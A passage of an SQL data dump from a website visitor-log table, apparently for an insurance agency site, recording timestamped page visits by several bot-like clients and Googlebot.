Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12116,'0b_1a61903c223adae197aefe792a12f0bc','1459765177','188.143.232.32','188.143.232.32','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12117,'0b_1a61903c223adae197aefe792a12f0bc','1459765187','188.143.232.32','188.143.232.32','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12119,'0b_a09e98d078e8ac5998b7da80830db28a','1459765361','66.249.75.109','crawl-66-249-75-109.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(12122,'0b_a09e98d078e8ac5998b7da80830db28a','1459765362','66.249.75.102','crawl-66-249-75-102.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(12123,'0b_1a61903c223adae197aefe792a12f0bc','1459765744','188.143.232.32','188.143.232.32','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12126,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765812','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12128,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765823','188.143.234.155','188.143.234.155','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12129,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765834','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12131,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765844','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12132,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765855','188.143.234.155','188.143.234.155','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12134,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765865','188.143.234.155','188.143.234.155','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12135,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765876','188.143.234.155','188.143.234.155','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12138,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765886','188.143.234.155','188.143.234.155','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12140,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765898','188.143.234.155','188.143.234.155','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12143,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765908','188.143.234.155','188.143.234.155','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12146,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765919','188.143.234.155','188.143.234.155','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12147,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765929','188.143.234.155','188.143.234.155','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12149,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765940','188.143.234.155','188.143.234.155','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12152,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765951','188.143.234.155','188.143.234.155','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12155,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765962','188.143.234.155','188.143.234.155','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12156,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765975','188.143.234.155','188.143.234.155','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12159,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765986','188.143.234.155','188.143.234.155','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12161,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459765996','188.143.234.155','188.143.234.155','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12162,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766007','188.143.234.155','188.143.234.155','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12164,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766017','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12167,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766028','188.143.234.155','188.143.234.155','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12170,'0b_86591f709cc886470d4b952b207fc3ce','1459766060','188.143.232.27','188.143.232.27','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12171,'0b_86591f709cc886470d4b952b207fc3ce','1459766124','188.143.232.27','188.143.232.27','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12173,'0b_86591f709cc886470d4b952b207fc3ce','1459766134','188.143.232.27','188.143.232.27','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12174,'0b_86591f709cc886470d4b952b207fc3ce','1459766145','188.143.232.27','188.143.232.27','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12176,'0b_86591f709cc886470d4b952b207fc3ce','1459766156','188.143.232.27','188.143.232.27','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12177,'0b_86591f709cc886470d4b952b207fc3ce','1459766167','188.143.232.27','188.143.232.27','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12179,'0b_86591f709cc886470d4b952b207fc3ce','1459766177','188.143.232.27','188.143.232.27','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12182,'0b_86591f709cc886470d4b952b207fc3ce','1459766188','188.143.232.27','188.143.232.27','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12183,'0b_86591f709cc886470d4b952b207fc3ce','1459766198','188.143.232.27','188.143.232.27','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12185,'0b_86591f709cc886470d4b952b207fc3ce','1459766209','188.143.232.27','188.143.232.27','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12186,'0b_86591f709cc886470d4b952b207fc3ce','1459766220','188.143.232.27','188.143.232.27','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12189,'0b_86591f709cc886470d4b952b207fc3ce','1459766231','188.143.232.27','188.143.232.27','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12192,'0b_86591f709cc886470d4b952b207fc3ce','1459766241','188.143.232.27','188.143.232.27','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12194,'0b_86591f709cc886470d4b952b207fc3ce','1459766252','188.143.232.27','188.143.232.27','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12197,'0b_86591f709cc886470d4b952b207fc3ce','1459766263','188.143.232.27','188.143.232.27','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12200,'0b_86591f709cc886470d4b952b207fc3ce','1459766274','188.143.232.27','188.143.232.27','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12201,'0b_86591f709cc886470d4b952b207fc3ce','1459766285','188.143.232.27','188.143.232.27','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12204,'0b_86591f709cc886470d4b952b207fc3ce','1459766296','188.143.232.27','188.143.232.27','/licensing-contracting','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12206,'0b_86591f709cc886470d4b952b207fc3ce','1459766306','188.143.232.27','188.143.232.27','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12207,'0b_86591f709cc886470d4b952b207fc3ce','1459766316','188.143.232.27','188.143.232.27','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12209,'0b_86591f709cc886470d4b952b207fc3ce','1459766327','188.143.232.27','188.143.232.27','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12210,'0b_86591f709cc886470d4b952b207fc3ce','1459766337','188.143.232.27','188.143.232.27','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12212,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766492','188.143.234.155','188.143.234.155','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12213,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766558','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12216,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766569','188.143.234.155','188.143.234.155','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12219,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766581','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12222,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766591','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12224,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766601','188.143.234.155','188.143.234.155','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12227,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766613','188.143.234.155','188.143.234.155','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12228,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766626','188.143.234.155','188.143.234.155','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12231,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766637','188.143.234.155','188.143.234.155','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12233,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766647','188.143.234.155','188.143.234.155','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12236,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766658','188.143.234.155','188.143.234.155','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12237,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766668','188.143.234.155','188.143.234.155','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12240,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766679','188.143.234.155','188.143.234.155','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12243,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766689','188.143.234.155','188.143.234.155','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12246,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766700','188.143.234.155','188.143.234.155','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12249,'0b_3d7cae85b64753fade7803da25aa9eb1','1459766703','188.143.232.32','188.143.232.32','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12252,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766711','188.143.234.155','188.143.234.155','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12255,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766721','188.143.234.155','188.143.234.155','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12258,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766731','188.143.234.155','188.143.234.155','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12260,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766732','188.143.234.155','188.143.234.155','/carriers','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12261,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766742','188.143.234.155','188.143.234.155','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12263,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766752','188.143.234.155','188.143.234.155','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12264,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766763','188.143.234.155','188.143.234.155','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12267,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766767','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12269,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766773','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12270,'0b_223f72f85dc307dd9f4a891de4108f5c','1459766776','188.143.234.155','188.143.234.155','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12273,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766782','188.143.234.155','188.143.234.155','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12275,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766793','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12276,'0b_86591f709cc886470d4b952b207fc3ce','1459766800','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12278,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766803','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12281,'0b_86591f709cc886470d4b952b207fc3ce','1459766810','188.143.232.32','188.143.232.32','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12282,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766815','188.143.234.155','188.143.234.155','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12284,'0b_86591f709cc886470d4b952b207fc3ce','1459766821','188.143.232.32','188.143.232.32','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12285,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766825','188.143.234.155','188.143.234.155','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12287,'0b_86591f709cc886470d4b952b207fc3ce','1459766831','188.143.232.32','188.143.232.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12290,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766836','188.143.234.155','188.143.234.155','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12293,'0b_86591f709cc886470d4b952b207fc3ce','1459766842','188.143.232.32','188.143.232.32','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12296,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766846','188.143.234.155','188.143.234.155','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12299,'0b_86591f709cc886470d4b952b207fc3ce','1459766852','188.143.232.32','188.143.232.32','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12300,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766857','188.143.234.155','188.143.234.155','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12303,'0b_86591f709cc886470d4b952b207fc3ce','1459766863','188.143.232.32','188.143.232.32','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12306,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766867','188.143.234.155','188.143.234.155','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12308,'0b_86591f709cc886470d4b952b207fc3ce','1459766875','188.143.232.32','188.143.232.32','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12311,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766877','188.143.234.155','188.143.234.155','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12314,'0b_86591f709cc886470d4b952b207fc3ce','1459766886','188.143.232.32','188.143.232.32','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36','','',0,'Win7','Chrome 40','ru','','','','','','','3','0',0),(12315,'0b_fade1d4a0f42ee1e200a4aa1dfee065a','1459766888','188.143.234.155','188.143.234.155','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 